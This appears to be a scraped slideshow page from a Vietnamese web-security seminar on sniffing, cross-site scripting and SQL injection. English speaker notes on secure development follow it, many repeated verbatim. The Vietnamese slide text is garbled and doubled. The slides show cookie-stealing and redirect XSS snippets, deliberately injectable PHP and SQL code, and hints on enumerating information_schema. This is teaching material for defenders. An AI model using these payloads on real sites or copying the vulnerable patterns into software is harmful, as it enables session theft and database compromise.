More Related Content
Similar to Seminiar hacking
Seminiar hacking
- 1. H I TH O B O M TỘ Ả Ả ẬH I TH O B O M TỘ Ả Ả Ậ Chuyên đ :ềChuyên đ :ề WEB APPLICATIONWEB APPLICATION
- 2. T m quan tr ng c a b o m t máyầ ọ ủ ả ậT m quan tr ng c a b o m t máyầ ọ ủ ả ậ tính:tính: ““If you know the enemy and know yourself,If you know the enemy and know yourself, you need not fear the result of a hundred battles”you need not fear the result of a hundred battles”
- 3. T m quan tr ng c a b o m t máyầ ọ ủ ả ậT m quan tr ng c a b o m t máyầ ọ ủ ả ậ tính:tính:
- 4. N I DUNG:ỘN I DUNG:Ộ HTTP HijackingHTTP Hijacking L i b o m t Cross Site Scripting (XSS)ỗ ả ậL i b o m t Cross Site Scripting (XSS)ỗ ả ậ L i b o m t SQL Injectionỗ ả ậL i b o m t SQL Injectionỗ ả ậ
- 5. Ph n 1: “Chôm” tài kho n Y/G mailầ ảPh n 1: “Chôm” tài kho n Y/G mailầ ả Câu chuy n th 1: Sniffingệ ứCâu chuy n th 1: Sniffingệ ứ
- 7. Cain & AbelCain & Abel
- 9. Chìa khóa 1:Chìa khóa 1: STATEFUL vs STATELESS PROTOCOLSTATEFUL vs STATELESS PROTOCOL Telnet, FTP, HTTP,…Telnet, FTP, HTTP,…
- 11. Wireless network SniffingWireless network Sniffing Monitor modeMonitor mode ChipsetChipset DriverDriver
- 12. AttackAttack
- 13. Q & AQ & A
- 14. Cross site Scripting (XSS)Cross site Scripting (XSS) Câu chuy n th 2:ệ ứCâu chuy n th 2:ệ ứ
- 15. Chìa khóa 2Chìa khóa 2
- 16. Client script: javascript, vbscriptClient script: javascript, vbscript <script><script> alert(123);alert(123); </script></script> <script><script> location.href='http://nhatnghe.com”;location.href='http://nhatnghe.com”; </script></script> <script><script> alert(document.cookie);alert(document.cookie); </script></script>
- 17. XSS là gì?XSS là gì? <?php $tim = $_GET['search']; echo "Ban da tim tu khoa la: $tim"; ?>
- 18. XSS là gì?XSS là gì? http://victim.com/foo.cgi?http://victim.com/foo.cgi? q=<html_javascript_exploit_code>...q=<html_javascript_exploit_code>...
- 19. Kh năng khai thác:ảKh năng khai thác:ả Đánh c p cookie sessionắĐánh c p cookie sessionắ Th c thi “command”ựTh c thi “command”ự PhishingPhishing Redirect other websiteRedirect other website Deface or DoS web pageDeface or DoS web page
- 20. DemoDemo
- 22. SQL querySQL query Select …. From …. WhereSelect …. From …. Where Insert into …Insert into … Update …. Set …..Update …. Set ….. Delete from ….Delete from ….
- 23. SQL InjectionSQL Injection http://site.com/?type=TVhttp://site.com/?type=TV <?php<?php $giatri = $_GET[‘type'];$giatri = $_GET[‘type']; SQL=“Select * from sanpham where type=SQL=“Select * from sanpham where type=‘‘“ +“ + $giatri + “$giatri + “’’”;”; ?>?>
- 24. SQL InjectionSQL Injection Khai thác d a trên l i không ki m tra bi n đ uự ỗ ể ế ầKhai thác d a trên l i không ki m tra bi n đ uự ỗ ể ế ầ vàovào Giá tr bi n đ c s d ng trong câu truy v n dị ế ượ ử ụ ấ ữGiá tr bi n đ c s d ng trong câu truy v n dị ế ượ ử ụ ấ ữ li uệli uệ Attacker thay đ i giá tr nh p li u d n đ n thayổ ị ậ ệ ẫ ếAttacker thay đ i giá tr nh p li u d n đ n thayổ ị ậ ệ ẫ ế đ i ho t đ ng câu truy v n và th c thi đ cổ ạ ộ ấ ự ượđ i ho t đ ng câu truy v n và th c thi đ cổ ạ ộ ấ ự ượ SQL command.SQL command.
- 25. DB: MSSQL & MySQLDB: MSSQL & MySQL Database: Information_schemaDatabase: Information_schema Table: tables (table_name)Table: tables (table_name) Table:columns (column_name,table_name)Table:columns (column_name,table_name)
- 26. DEMODEMO
- 27. Q & AQ & A
Editor's Notes
- In this session, we will focus on security fundamentals. Specifically, we will discuss: Why application security matters. Secure development practices. The range of security technologies that are available. How developers should consider security at all stages of the development process.
- In this agenda topic, we will focus on the importance of application security. Specifically, we will discuss: Trustworthy computing. Connection scenarios and security concerns. Common types of attacks on software systems. Examples of security intrusions. Consequences of poor security. The challenges involved in secure computing. The role of developers in creating secure applications.
- Workforce mobility is increasing, and consequently, the way in which employees connect to your company’s network is evolving. Employees connect in a number of different ways, including traditional wired connections, new and evolving wireless network standards, and dial-up and broadband virtual private network (VPN) connections. The variety of ways your mobile users connect to your company’s network introduces a number of security concerns, including: Wireless susceptibility. Although wireless networks can be as secure as wired networks if administered properly, by default, many wireless networks provide the opportunity for any compatible device to connect in an ad-hoc manner. Employee home security. Many employees have wireless networks at home, and may not be aware of the issues that are involved with securing this type of network. Furthermore, always-on broadband connections make home networks (whether wireless or not) more susceptible to viruses and attackers. The potential susceptibility of home networks may result in viruses or attackers gaining access to your corporate network, either when the user connects over a VPN or when they physically plug their computers into the network on your company’s premises. Although virus checkers and firewalls can help secure home networks and broadband connections, it is often difficult for your network administrators to enforce the use of these defences. Employees increasingly use their laptop computers and other mobile devices to connect to wireless networks run by third parties. For example, they might connect to WiFi hotspots in coffee houses, airports, hotels, and other places to check their e-mail or to browse the Internet. Because your company has no control over the security of these public networks, they provide a potential route for attackers or viruses. As with home networks, this may result in viruses or attackers gaining access to your corporate network, either when the user connects over a VPN or when they physically plug their computers into the network on your company’s premises. Applications are becoming increasingly dependant on connections to the Internet, for updated data, Web services, and so on. The Internet is a potential route to your systems for attackers and viruses. Many businesses require a persistent connection to the Internet so that they can provide Web sites, File Transfer Protocol (FTP) site, and Web services. As already stated, the Internet is a potential route to your systems for attackers and viruses. Security attacks will also still happen from within your enterprise. This could be as simple as an employee who writes down a password which then falls into the wrong hands, or it could be deliberate actions from a disgruntled employee. It is important to remember that security is not just required for public facing connections.
- Organizational attacks involve one organization breaking into your network to try to access confidential information, thereby gaining a business advantage. Attackers like to exercise their skill in attempting to bypass security safeguards to gain illegal access to your network. Automated attacks use software to scan for network vulnerabilities, or to implement a brute force attack. Brute force attacks involve trying many different usernames and passwords or other credentials to gain access to your resources. Denial of Service attacks overwhelm a server with requests for action, thereby rendering it incapable of providing its normal service. Viruses, Trojan horse, and worms are harmful programs that act by exploiting some known vulnerability to install themselves on a computer (perhaps by entering as an attachment to an e-mail). Once present on a computer, they distributes copies of themselves to other connected computers, and these copies also replicate themselves, resulting in a viral-like infection of the computer network. Accidental breaches in security often result from poor practices or procedures. For example, the exposure of security information, such as usernames and passwords, can be exploited by an attacker to gain access to your network.
- CodeRed is a worm that: Uses randomly generated IP addresses to spread. If the worm infects a vulnerable IIS server, it creates 100 threads first. Out of those initial 100 threads, it uses 99 threads to spread the worm while the 100th thread checks to see if it is running on a English (U.S.) Microsoft Windows NT® or Windows 2000 system. If the infected system is found to be an English (U.S.) system, the worm will proceed to deface the infected system’s website. Exploits an unchecked buffer overrun in Microsoft Index Server 2.0, a component of Internet Information Services (IIS) servers. Includes code designed to overwhelm the www.whitehouse.gov website. ILOVEYOU is a virus that: Is contained in an e-mail attachment called LOVE LETTER FOR YOU.TXT.VBS (a Visual Basic Script file). Relies on the e-mail recipient opening the attachment. Deletes image files and MP3 files. Corrupts the registry. Spreads by copying the e-mail to all users in the address book. Nimda is a virus that: Spreads itself in e-mail attachments named README.EXE. Locates EXE files on the local computer and infects them by copying the virus file inside their body as a resource. These files then spread the infection when users exchange programs such as games. Scans the Internet for vulnerable servers and defaces Web pages on those servers, leading to further propagation of the worm through users browsing the infected sites. Infects network shares, causing any user who opens a Word document on those shares to become infected. Reads e-mail addresses from your e-mail client and also searches local HTML files looking for additional addresses. It then sends one e-mail to each address containing the README.EXE attachment.
- Poor security will result in serious damage to your business. Your competitors may gain knowledge of your systems or technology, denying you any competitive advantage. Competitors may also be able to copy your ideas or technology and put them to advantage in their own products. An attack may result in your systems being taken offline while the damage is assessed and rectified. All effort expended combating security attacks and repairing the damage is lost productivity. This time and effort could have been spent pursuing the business goals of your enterprise. Your business reputation will be damaged. When security lapses are reported, the assumption is that if your systems security is bad, then many of your other practices will also be bad. It is easy to come to the conclusion that your products and systems are equally poor. Consumers who are unable to use your website because it has been hacked, or who see a defaced website, will visit your competitors’ websites instead. The financial losses from security intrusions can be substantial. It is difficult to determine the exact cost of issuing a security fix, but the Microsoft Security Response Center believes a security bug that requires a security bulletin costs approximately $100,000.
- The challenges faced when implementing security include balancing the advantages that the attacker has over the defenders, and how the degree of security affect users, as well as conveying the message that security does add business value. Attackers vs. Defenders: The defender must protect all points; the attacker can choose the weakest point. The defender must be constantly vigilant; the attacker can attack at any time. Security vs. Usability: Security can be taken to extremes, making the application too difficult to use. Secure developers should strive to make the system as secure as possible, but not to make it impossible to use. Complex and strong passwords are those that must contain a mixture of uppercase and lowercase letters, and possibly punctuation characters. They must also be long – perhaps 9 or more characters in length. However, there is often user resistance to strong passwords, because they are more difficult to remember. As soon as a user decides to write down a password so that they can remember it, your security is compromised. Security As An Afterthought: Security is often seen as a functionality disabler, as something that gets in the way. However, there is nothing more disabling than an attacker being able to get at your sensitive data. There is also a perception that the cost of implementing security is high and the business benefits are unclear. However, the cost of poor security can be very high, and in exceptional circumstances, could result in business failure. Building security in from the start is essential to ensure a robust solution. If security is the last issue addressed, fixing of any security vulnerabilities that are discovered may break other product functionality, and in common with any other late changes in the product development cycle, it is much more expensive than if security is designed in in the first place.
- The challenges faced when implementing security include balancing the advantages that the attacker has over the defenders, and how the degree of security affect users, as well as conveying the message that security does add business value. Attackers vs. Defenders: The defender must protect all points; the attacker can choose the weakest point. The defender must be constantly vigilant; the attacker can attack at any time. Security vs. Usability: Security can be taken to extremes, making the application too difficult to use. Secure developers should strive to make the system as secure as possible, but not to make it impossible to use. Complex and strong passwords are those that must contain a mixture of uppercase and lowercase letters, and possibly punctuation characters. They must also be long – perhaps 9 or more characters in length. However, there is often user resistance to strong passwords, because they are more difficult to remember. As soon as a user decides to write down a password so that they can remember it, your security is compromised. Security As An Afterthought: Security is often seen as a functionality disabler, as something that gets in the way. However, there is nothing more disabling than an attacker being able to get at your sensitive data. There is also a perception that the cost of implementing security is high and the business benefits are unclear. However, the cost of poor security can be very high, and in exceptional circumstances, could result in business failure. Building security in from the start is essential to ensure a robust solution. If security is the last issue addressed, fixing of any security vulnerabilities that are discovered may break other product functionality, and in common with any other late changes in the product development cycle, it is much more expensive than if security is designed in in the first place.
- Solution architects, developers, and systems administration personnel must all work together and take collective responsibility for security. Developers must adopt good practices that ensure the production of secure software. They must be knowledgeable about security vulnerabilities and how to avoid them, and must have both a broad and deep knowledge about security technologies and how to use them in order to create secure solutions.
- A holistic approach to security is required. You must consider security at all project stages and for network, host, and application layers. Even if you have the most secure network infrastructure possible, with completely hardened servers, a simple vulnerability in your application (for example, failing to validate input) renders all of that useless. A holistic approach to security is simply a mindset that developers should adopt. It forms the basis for specific architectures, such as Defense in Depth (DiD), which is explained in the “Writing Secure Code – Best Practices” presentation. In short, you need to &quot;bake security into your application development lifecycle&quot;. For step-by-step guidance on how to achieve this, refer to the Patterns and Practices documentation at http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMFastTrack.asp
- The Secure Windows Initiative team at Microsoft has adopted a simple set of strategies called SD3. The SD3 framework has three core concepts: Secure by Design, Secure by Default, and Secure in Deployment. These concepts have shaped the development process to help deliver secure systems. Secure by Design means that you have taken the appropriate steps to ensure that the overall design of the product is secure from the outset. Include threat modeling at the design phase and throughout the project to identify potential vulnerabilities. Use secure design, coding, and testing guidelines. Secure by Default means that the product is released so that it is secure out of the box. If features are optional, and you can turn them off by default. If a feature is not activated, then an attacker cannot use it to compromise your product. Ensure that only the least amount of privilege is required by user accounts to run your application. Then a compromise can have less serious consequences than if an attacker is able to run malicious code under an account with administrator privileges. Ensure that effective access controls are in place for resources. Secure in Deployment means that the system is maintainable after installation. If a product is difficult to administer, it makes it more difficult to maintain protection against security threats as new ones evolve. Ensure that users are educated to use the system in a secure manner. If a security vulnerability is discovered and a patch is necessary, ensure that the fix is fully tested internally and then issued in a timely manner.
- A holistic approach to security is required. You must consider security at all project stages and for network, host, and application layers. Even if you have the most secure network infrastructure possible, with completely hardened servers, a simple vulnerability in your application (for example, failing to validate input) renders all of that useless. A holistic approach to security is simply a mindset that developers should adopt. It forms the basis for specific architectures, such as Defense in Depth (DiD), which is explained in the “Writing Secure Code – Best Practices” presentation. In short, you need to &quot;bake security into your application development lifecycle&quot;. For step-by-step guidance on how to achieve this, refer to the Patterns and Practices documentation at http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMFastTrack.asp
- A holistic approach to security is required. You must consider security at all project stages and for network, host, and application layers. Even if you have the most secure network infrastructure possible, with completely hardened servers, a simple vulnerability in your application (for example, failing to validate input) renders all of that useless. A holistic approach to security is simply a mindset that developers should adopt. It forms the basis for specific architectures, such as Defense in Depth (DiD), which is explained in the “Writing Secure Code – Best Practices” presentation. In short, you need to &quot;bake security into your application development lifecycle&quot;. For step-by-step guidance on how to achieve this, refer to the Patterns and Practices documentation at http://msdn.microsoft.com/library/en-us/dnnetsec/html/THCMFastTrack.asp
- It is crucial that security is built into the entire development lifecycle from architecture and design, through development, testing, deployment, and operations. The activities shown on this slide are iterative and ongoing. These activities are not one-off activities – they continue throughout the development lifecycle.
- It is crucial that security is built into the entire development lifecycle from architecture and design, through development, testing, deployment, and operations. The activities shown on this slide are iterative and ongoing. These activities are not one-off activities – they continue throughout the development lifecycle.
- You cannot build a secure system until you understand your threats, because you will not know what to defend against. Threat modelling is covered in more detail in the “Writing Secure Code – Best Practices” presentation. The threat modelling process is as follows: Assemble the threat-modelling team. Decompose the application and analyze its operation by using data flow diagrams (DFD) or similar. Examine the data flows and use cases and determine the threats to the system. Rank the threats by decreasing risk. Choose how to respond to the threats. Choose techniques to mitigate the threats. Choose the appropriate security technologies for the identified techniques.
- An important part of delivering secure systems is raising awareness of the needs for secure programming and keeping all users up to date with ongoing security education. It is important for all team members to understand how security technologies work. Without that knowledge, you cannot be an effective team member when taking part in threat modelling, or in doing security code reviews. However, understanding security technologies on their own does not mean that your application is secure. It is important not only to know how the technologies work, but how to use them to solve security problems. It is essential that programmers know what flawed code looks like so that they can pick up vulnerabilities in code reviews. Developers need to be fully aware of common security mistakes and know how to avoid or rectify them. Analysis of any vulnerable code is important so that the same mistake can be avoided in the future, and similar vulnerabilities elsewhere in the product can be identified and resolved.
- An important part of delivering secure systems is raising awareness of the needs for secure programming and keeping all users up to date with ongoing security education. It is important for all team members to understand how security technologies work. Without that knowledge, you cannot be an effective team member when taking part in threat modelling, or in doing security code reviews. However, understanding security technologies on their own does not mean that your application is secure. It is important not only to know how the technologies work, but how to use them to solve security problems. It is essential that programmers know what flawed code looks like so that they can pick up vulnerabilities in code reviews. Developers need to be fully aware of common security mistakes and know how to avoid or rectify them. Analysis of any vulnerable code is important so that the same mistake can be avoided in the future, and similar vulnerabilities elsewhere in the product can be identified and resolved.
- An important part of delivering secure systems is raising awareness of the needs for secure programming and keeping all users up to date with ongoing security education. It is important for all team members to understand how security technologies work. Without that knowledge, you cannot be an effective team member when taking part in threat modelling, or in doing security code reviews. However, understanding security technologies on their own does not mean that your application is secure. It is important not only to know how the technologies work, but how to use them to solve security problems. It is essential that programmers know what flawed code looks like so that they can pick up vulnerabilities in code reviews. Developers need to be fully aware of common security mistakes and know how to avoid or rectify them. Analysis of any vulnerable code is important so that the same mistake can be avoided in the future, and similar vulnerabilities elsewhere in the product can be identified and resolved.
- An important part of delivering secure systems is raising awareness of the needs for secure programming and keeping all users up to date with ongoing security education. It is important for all team members to understand how security technologies work. Without that knowledge, you cannot be an effective team member when taking part in threat modelling, or in doing security code reviews. However, understanding security technologies on their own does not mean that your application is secure. It is important not only to know how the technologies work, but how to use them to solve security problems. It is essential that programmers know what flawed code looks like so that they can pick up vulnerabilities in code reviews. Developers need to be fully aware of common security mistakes and know how to avoid or rectify them. Analysis of any vulnerable code is important so that the same mistake can be avoided in the future, and similar vulnerabilities elsewhere in the product can be identified and resolved.
- The challenges faced when implementing security include balancing the advantages that the attacker has over the defenders, and how the degree of security affect users, as well as conveying the message that security does add business value. Attackers vs. Defenders: The defender must protect all points; the attacker can choose the weakest point. The defender must be constantly vigilant; the attacker can attack at any time. Security vs. Usability: Security can be taken to extremes, making the application too difficult to use. Secure developers should strive to make the system as secure as possible, but not to make it impossible to use. Complex and strong passwords are those that must contain a mixture of uppercase and lowercase letters, and possibly punctuation characters. They must also be long – perhaps 9 or more characters in length. However, there is often user resistance to strong passwords, because they are more difficult to remember. As soon as a user decides to write down a password so that they can remember it, your security is compromised. Security As An Afterthought: Security is often seen as a functionality disabler, as something that gets in the way. However, there is nothing more disabling than an attacker being able to get at your sensitive data. There is also a perception that the cost of implementing security is high and the business benefits are unclear. However, the cost of poor security can be very high, and in exceptional circumstances, could result in business failure. Building security in from the start is essential to ensure a robust solution. If security is the last issue addressed, fixing of any security vulnerabilities that are discovered may break other product functionality, and in common with any other late changes in the product development cycle, it is much more expensive than if security is designed in in the first place.
- The challenges faced when implementing security include balancing the advantages that the attacker has over the defenders, and how the degree of security affect users, as well as conveying the message that security does add business value. Attackers vs. Defenders: The defender must protect all points; the attacker can choose the weakest point. The defender must be constantly vigilant; the attacker can attack at any time. Security vs. Usability: Security can be taken to extremes, making the application too difficult to use. Secure developers should strive to make the system as secure as possible, but not to make it impossible to use. Complex and strong passwords are those that must contain a mixture of uppercase and lowercase letters, and possibly punctuation characters. They must also be long – perhaps 9 or more characters in length. However, there is often user resistance to strong passwords, because they are more difficult to remember. As soon as a user decides to write down a password so that they can remember it, your security is compromised. Security As An Afterthought: Security is often seen as a functionality disabler, as something that gets in the way. However, there is nothing more disabling than an attacker being able to get at your sensitive data. There is also a perception that the cost of implementing security is high and the business benefits are unclear. However, the cost of poor security can be very high, and in exceptional circumstances, could result in business failure. Building security in from the start is essential to ensure a robust solution. If security is the last issue addressed, fixing of any security vulnerabilities that are discovered may break other product functionality, and in common with any other late changes in the product development cycle, it is much more expensive than if security is designed in in the first place.